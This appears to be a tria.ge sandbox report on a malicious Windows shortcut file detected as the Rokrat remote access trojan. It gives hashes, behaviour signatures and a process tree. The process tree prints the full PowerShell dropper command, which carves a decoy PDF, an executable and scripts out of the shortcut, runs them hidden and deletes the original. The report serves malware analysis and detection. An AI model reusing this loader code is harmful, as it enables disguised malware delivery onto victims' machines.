Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
09/04/2024, 01:58
General
-
Target
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
-
Size
56.2MB
-
MD5
358122718ba11b3e8bb56340dbe94f51
-
SHA1
0c61effe0c06d57835ead4a574dde992515b9382
-
SHA256
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
-
SHA512
7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01
-
SSDEEP
98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn
Malware Config
Signatures
-
Detect Rokrat payload 2 IoCs
-
Rokrat
Rokrat is a remote access trojan written in c++.
-
Blocklisted process makes network request 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DACD951A229C6A68833AA5F48F1FD5B3 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4C45D089C5B9D6BD4983C7455E264EB1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4C45D089C5B9D6BD4983C7455E264EB1 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:16⤵
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6473EA30E2A725634C0F34F7B266AE16 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6473EA30E2A725634C0F34F7B266AE16 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:16⤵
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B9D1FB36430807F2007ADCD709B6874D --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D52BB1E171A1F39BE6CB6EE1F5546092 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AA7AE9C84860EA7CB988BCE413A0187A --mojo-platform-channel-handle=1984 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"5⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eogss3cs\eogss3cs.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DFA.tmp" "c:\Users\Admin\AppData\Local\Temp\eogss3cs\CSCD188DF807F524EB0A737C0B8B2BFD6BA.TMP"7⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\prt2c2kk\prt2c2kk.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\prt2c2kk\CSC80B2F9C5B38C4D1BB717C03DE6D3734B.TMP"7⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebh3iuyy\ebh3iuyy.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F71.tmp" "c:\Users\Admin\AppData\Local\Temp\ebh3iuyy\CSCC4B15910B91A4F46816E12DBA23D16A.TMP"7⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jopjq113\jopjq113.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES800D.tmp" "c:\Users\Admin\AppData\Local\Temp\jopjq113\CSC7B027557D534A1AB189EBFA362BE332.TMP"7⤵
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD50c71bc6c87639460aa52cb5fe3ba3359
SHA1bf02d394ea0409c46e9a1963a5015f2968f712bd
SHA25695b722158ec7317faa24ed88f968d139c483d37f308aa2c11f6babb22cc3df73
SHA5128cc3fa25b5847386e3c0e6bcf29fc81c17aab0e2200a2f60488107002f16691383a7aff6a2bb5b93f2a7d2e47f13a6dc0fd1b8216b34efcfeed4767d6baf4e96
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
19KB
MD5257bfcbe31774f8b3859a696295da21b
SHA13ef6ee7ce9a28953c5fbcefb2fe684bb8c1928ac
SHA256dfd54ba9eab35e3eac7775c71838f1883a5f8d93a529f9819cdb4cc7b037919f
SHA5123b1105c619019c5d132b97fd5af94ae32276f0f0873025807d8b90831524ae7d0f434ed271f445c68943f7e475d915686b78a950dd4b4aad412115afafcfc431
-
Filesize
53KB
MD5721485f5cbeb4c86d828ce05d4630eb1
SHA124d734ccea13678d4fa48fc9b1857e5a48ab80dd
SHA256992a648300cce065459fdf51ee34694c1567e87a5fdd19347f4734ec423db992
SHA512d63ce4851ea095af93e36a879eac9e6dd17280d53aa104165af1d5b2423836783bb126692890e15a7d445f80ea2aa79ebee72a1828eca978ae2c03d8bb174455
-
Filesize
1KB
MD5bff3f9b08ba6525283ec0d4d351e1b80
SHA17b81889a012aba5ad0919741e76878ff9e376d16
SHA256af994c38cd48c25a21f7fdfa38bcd6bd34ca896339c6f399b9e698a625e7bdea
SHA5129188ac7ae3b6b592e4ffef03a45c0a4334df7103d85083760a5aebad698af72de68a7ca8b793a15998a573bae8dee221469fedb09d186458b53409f8c417d08a
-
Filesize
1KB
MD52578480f723c0cd9b402c0ab3132df74
SHA1900962dbfedff679d542f6edeb819c1d03e8649d
SHA2566f15745bead4988ce5f502a504c234cd62ff1c998e8c66892ded5982de86f960
SHA51279e34c795edf06ce0c71e391501410f5fbce67d196ba89c4dfb3dba58ea5b1122ad798520ba1cf2aadecab709010650c1f47d1d4dd124996297ecfa21225f912
-
Filesize
1KB
MD566c2c0fb1ccaf54c2fabce6c961ccfb3
SHA1ac48c4ec54a8b59d372475e8d35cb75b7d42d74b
SHA2560dfb1d08cb6607540c62b8a87dd2051e73dd56a7fc430ac4b1f84748e985f8f0
SHA5127be7ef9fe7160608286101b55c66ac664bede6faf3524a7872763e66520dbe282955559ead39a31c99e72afe3994303342405ebf672f611567668cac6d6ffaf0
-
Filesize
1KB
MD51d9f03a8d67e6a826f53baf7d9b9a338
SHA1429c3df169ce42a0429ea28fe833c8ad2aa02c21
SHA25629efaef2629962946ca142b4668447a797deff425fab1295000cab0f7a7a22e7
SHA512ff2c6675cefc4a7403ea201036a2cabf7c288b3cd8669c11be619012120316c4fe7127dc272fd730107670a616d9015b2f15381bd1c35b68da46be9c8b83bca2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.7MB
MD529ec187f2ed2eca0953dca0a68ac3722
SHA1a20557b2e4a8b2c5e8a735c5d2f30aeaad01726e
SHA25681269c3c41d957765314a1704e0ea6cdf9666eab729597207fd1cc844c749beb
SHA512890a37f5e8fbe4d1cef6d52ec0c7b6dbf378f3545a59cdef1d796fee0aec8662564cdfd86f019f8e6bd60d8c678b72746200a1ce917a867bd21546ed06ac2bc8
-
Filesize
3KB
MD5370809364325ed83e9a24e3ff15b15a5
SHA15417612ce4cdfdd1183463a1a21bcadb235becbf
SHA2564a49ac364e304c63eb8bb99f56792a2c789238d1ae90a23bcb0c98202662c9d7
SHA512671876dd60709be08b1c63c837b57c3a64de7a47d488c69f2e96730648ba8c595e55c3dbf094ce4c52f97fbcbab212d04ce1384c1cd74d844c79d1347c87fc55
-
Filesize
3KB
MD5553bbd47b062916afcfe1ea78a63673d
SHA11a1cb949f32d6cea0aa1eba8709cf296e91562e7
SHA256afbf15a19c78d64248852904bc11d8e20a9813f40ad0b83b90d2fdc351501578
SHA5127d0cfda209aed9fe650c5c20d07e8e1d5b477d45d9ccbc1a5c8ec0349632aed6c0ee2ee048411c7c4693a73c571edd2a1ba9e9b270047196fd6329ec4ec1e6f6
-
Filesize
3KB
MD5e070d2c7c4300428c683a09ab91c2b60
SHA1d1066458da0089532035c861b97f09af6a520dfe
SHA256c8f1a1d666c6cc90b09ecd5f8b786756188e5b04411d022befa1bca20190198c
SHA5125b0229b029549233006692d50ad0422a4dcfa8349e55aa2da32446d45ee6b5775223e221434396bb40732b715098fe72c74eff5bfd887a7b61e9cf48a96703bb
-
Filesize
1KB
MD5655f58dcd7cd8bd996076ad4b492ae00
SHA17d69d7926de1ad560f0d002bd768eb182177cca4
SHA2564e9d83e270910fa2610a2bdb0fef2bc2f5a2c257ce8c9eb5ba3f73eb051f5cf7
SHA51287575186d8674c4be4f736db9b008b5ef975a21b60d38a635ad874dd399b5263fc6cba94e6010681c6262241df3b1f3074411c815121141414727c326d70e204
-
Filesize
311B
MD5f5787b3e60fad2b255ebc54d0ce747dc
SHA1830705c5417f11c730cd8bbde4a2a709671cc11d
SHA256a43f7b080c30816997fc15589f904365917f30ae15441b22fbda11aec2ddf1c0
SHA5121e702414e37c90da42457295653e4df5a64208476206e001d8c23edfe5b8e7e5145672b5e0abf5bc4667e4e059735066db4c0a6a04cca259eb96e7755ce6cd8f
-
Filesize
3KB
MD5cd058f2cd5ff06c92f8f774503d245a0
SHA15f71276872de19ae57aa912bf8084487003b9bd3
SHA256b57072e0e869e391de0e098e91fd5b2ad9e60a9c65e38236ad5ddb200c5edc4d
SHA512cb368c420c2add3d6cc5bcaa092d9be502e60ded601c9655701d8f2272eaa2062e0e5cd667fb4cb3481dcb17ef220b41009281b537de2202e82b43279a883367
-
Filesize
869KB
MD5a043b3a2af9db6173e3a39b5c501a9bd
SHA14250f3855e53ccf755f8a05b1998f55dfa4b2c0e
SHA256dc6ca2e9ce800245a65715647bb1614c35632f270d1879e796472e786cdfc0fc
SHA512a667c8521589e96ba57b2ae6e429f43a352c36968edb4cadf57500a1a5e39511b3e7109bb2c372b9567c8e50777cfc71f0cb8150f2782a6a8ac9d90222f802f5
-
Filesize
652B
MD5fb875039cb06575671b020701d90fd17
SHA12ba50147079fdf424e59fa51aa4881f41530b3cf
SHA256aeeffa26cc622cdcd06afbb912a1e848b9d00eaccbf05c85c1bd5496697f11ea
SHA51209a9e0a6d461e0cd03c394ff3501b7494a325c71ca99efb9086b651d01a39af21bee71faa21bbe4102302df9d847236d001b417544aaedca0334749c34a65c83
-
Filesize
286B
MD5b23df8158ffd79f95b9bddd18738270b
SHA179e81bb74bc53671aeabecae224f0f9fe0e3ed7f
SHA256856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882
SHA512e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f
-
Filesize
369B
MD527d15759dd3ce74eea0a8f5aea087bb6
SHA1647900e2f34dab1bce06dc33dec555e6b32ae058
SHA256d1ec8c7492bcbba5d202e95a38e6c0e4e95b5ac99563c84272ae36389516bb0a
SHA512b6c966e0bb7e04471b8f8b0827be0111b96ef25219c17882e549d6b1e6568c609e91131cdc8c2c1d34aca06acbcb1ba6ca3338836f87dc7936c8317ddd083377
-
Filesize
652B
MD53b48f291ee4d5e61847f07fcdc98f481
SHA1f203de71beeadb7930fc32f4ae9986d13ff6eca2
SHA25665da2c41dd544f55a95761ab8798d6a0f4a36fb4c8d771cde0b038bc335ca240
SHA5126959fc4e23b274e9b241fe92a8ec37d63122a55f2367885b3fe5838da5c95ac7dc5bbf6ab7c191d60185099c8082cf3ef327d656eaab4ba92827b277ec621843
-
Filesize
249B
MD569ecfeb3e9a8fb7890d114ec056ffd6d
SHA1cba5334d2ffe24c60ef793a3f6a7f08067a913db
